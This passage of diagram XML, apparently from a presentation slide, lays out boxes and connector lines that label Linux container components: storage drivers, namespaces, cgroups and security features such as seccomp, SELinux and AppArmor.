          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4745155" y="2775198"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{37E71803-FCFC-45CD-881A-0B6ABB3D09EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6770314" y="0"/>
          <a:ext cx="2098659" cy="3655384"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="1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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Security</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6770314" y="0"/>
        <a:ext cx="2098659" cy="1096615"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E0E40906-6643-4F9A-933A-C9F50702F6A6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6980180" y="1096704"/>
          <a:ext cx="1678927" cy="532511"/>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Capabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6995777" y="1112301"/>
        <a:ext cx="1647733" cy="501317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9132D05-4FA0-424A-AF25-E417BE74898D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6980180" y="1711140"/>
          <a:ext cx="1678927" cy="532511"/>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Seccomp</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6995777" y="1726737"/>
        <a:ext cx="1647733" cy="501317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9BD8B9E-F3BD-41E8-9989-9E3EAD575A42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6980180" y="2325577"/>
          <a:ext cx="1678927" cy="532511"/>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err="1" smtClean="0"/>
            <a:t>SELinux</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6995777" y="2341174"/>
        <a:ext cx="1647733" cy="501317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6B803797-6FD1-4CE6-9C71-3D6893295E52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6980180" y="2940013"/>
          <a:ext cx="1678927" cy="532511"/>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err="1" smtClean="0"/>
            <a:t>AppArmor</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6995777" y="2955610"/>
        <a:ext cx="1647733" cy="5013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CE6A75-3FF8-4194-99FE-9831B266366F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2138" y="0"/>
          <a:ext cx="2098659" cy="3655384"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="1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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Storage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2138" y="0"/>
        <a:ext cx="2098659" cy="1096615"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12D643E0-AF48-4183-BB35-81B6A0C9602C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="212004" y="1096927"/>
          <a:ext cx="1678927" cy="718136"/>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OverlayFS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="233037" y="1117960"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B22F2000-CB74-453E-B358-5701BFC71E06}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="212004" y="1925546"/>
          <a:ext cx="1678927" cy="718136"/>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err="1" smtClean="0"/>
            <a:t>Aufs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="233037" y="1946579"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{842C65AE-1601-4DFE-91A4-DE6A3AA19EB9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="212004" y="2754165"/>
          <a:ext cx="1678927" cy="718136"/>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Device Manager</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="233037" y="2775198"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FBB82117-9837-4D37-BC7F-DB3F82D556BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2258197" y="0"/>
          <a:ext cx="2098659" cy="3655384"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="1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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Namespaces</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2258197" y="0"/>
        <a:ext cx="2098659" cy="1096615"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7072083A-8581-4329-9DA0-477B82581EDE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="1096793"/>
          <a:ext cx="1678927" cy="350947"/>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PID</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="1107072"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16C8F441-0E86-4BA4-8205-623AF8A01764}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="1501732"/>
          <a:ext cx="1678927" cy="350947"/>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User</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="1512011"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D9DE7586-6054-4E01-82D6-6CA481C824AF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="1906671"/>
          <a:ext cx="1678927" cy="350947"/>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MNT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="1916950"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4EEEF414-5E73-42B1-80EC-B52F54E5145E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="2311610"/>
          <a:ext cx="1678927" cy="350947"/>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IPC</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="2321889"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4A8EAC8B-62AB-4CCE-8A50-0E3B8EC18EA9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="2716550"/>
          <a:ext cx="1678927" cy="350947"/>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UTS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="2726829"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DCE4E765-3C65-4E4E-AB52-2A237FE0C3AC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="3121489"/>
          <a:ext cx="1678927" cy="350947"/>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NET</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="3131768"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2AE096B0-E6DB-4467-AFE8-90C18B3946CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4514256" y="0"/>
          <a:ext cx="2098659" cy="3655384"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="1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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>CGROUPS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4514256" y="0"/>
        <a:ext cx="2098659" cy="1096615"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EAF9D065-4A1A-487B-8034-89DC20147E9F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4724122" y="1096927"/>
          <a:ext cx="1678927" cy="718136"/>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CPU</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4745155" y="1117960"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DE26DBA6-60A8-4CCA-85C8-D71573485800}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4724122" y="1925546"/>
          <a:ext cx="1678927" cy="718136"/>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Memory</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4745155" y="1946579"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DDE998AB-26DA-4751-B5BE-A52201553888}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4724122" y="2754165"/>
          <a:ext cx="1678927" cy="718136"/>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Device</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4745155" y="2775198"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{37E71803-FCFC-45CD-881A-0B6ABB3D09EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6770314" y="0"/>
          <a:ext cx="2098659" cy="3655384"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="1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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Security</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6770314" y="0"/>
        <a:ext cx="2098659" cy="1096615"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E0E40906-6643-4F9A-933A-C9F50702F6A6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6980180" y="1096704"/>
          <a:ext cx="1678927" cy="532511"/>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Capabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6995777" y="1112301"/>
        <a:ext cx="1647733" cy="501317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9132D05-4FA0-424A-AF25-E417BE74898D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6980180" y="1711140"/>
          <a:ext cx="1678927" cy="532511"/>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Seccomp</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6995777" y="1726737"/>
        <a:ext cx="1647733" cy="501317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9BD8B9E-F3BD-41E8-9989-9E3EAD575A42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6980180" y="2325577"/>
          <a:ext cx="1678927" cy="532511"/>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err="1" smtClean="0"/>
            <a:t>SELinux</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6995777" y="2341174"/>
        <a:ext cx="1647733" cy="501317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6B803797-6FD1-4CE6-9C71-3D6893295E52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6980180" y="2940013"/>
          <a:ext cx="1678927" cy="532511"/>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err="1" smtClean="0"/>
            <a:t>AppArmor</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6995777" y="2955610"/>
        <a:ext cx="1647733" cy="5013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AC797-A030-4659-BE14-194F33ABD3FD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="2239202"/>
          <a:ext cx="310349" cy="1668126"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="1668126"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="16681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10292B-6E1B-401C-B150-ED662D062485}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="2239202"/>
          <a:ext cx="310349" cy="1000875"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="1000875"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="10008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D6CDF7-92A3-4A15-98F2-7B5E27282B1C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="2572827"/>
          <a:ext cx="310349" cy="2002561"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="2002561"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="2002561"/>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CB25A038-CE0D-4D43-8348-EDF1AF2A25DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="2572827"/>
          <a:ext cx="310349" cy="1344894"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="1344894"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="1344894"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{1B254077-7700-4884-BB50-56F29058CC59}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="2572827"/>
          <a:ext cx="310349" cy="667250"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="667250"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="667250"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{9816B1EC-E83E-4561-B663-A537448E26A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="2527107"/>
          <a:ext cx="310349" cy="91440"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="45720"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="310349" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{BC5E2220-DD32-4CE1-A7E7-570EDF1B65CA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="1905577"/>
          <a:ext cx="310349" cy="667250"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="667250"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="667250"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="0"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{702981F1-F4B1-44F0-B945-1A0BEFEDD3C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="1238326"/>
          <a:ext cx="310349" cy="1334501"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1334501"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="1334501"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="0"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{BEBE32FF-E96A-443B-94E1-5C446D1A7C28}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6806980" y="571075"/>
          <a:ext cx="310349" cy="333625"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="333625"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="333625"/>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333316B4-59D3-4475-BB44-2808BE29157B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6806980" y="237450"/>
          <a:ext cx="310349" cy="333625"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
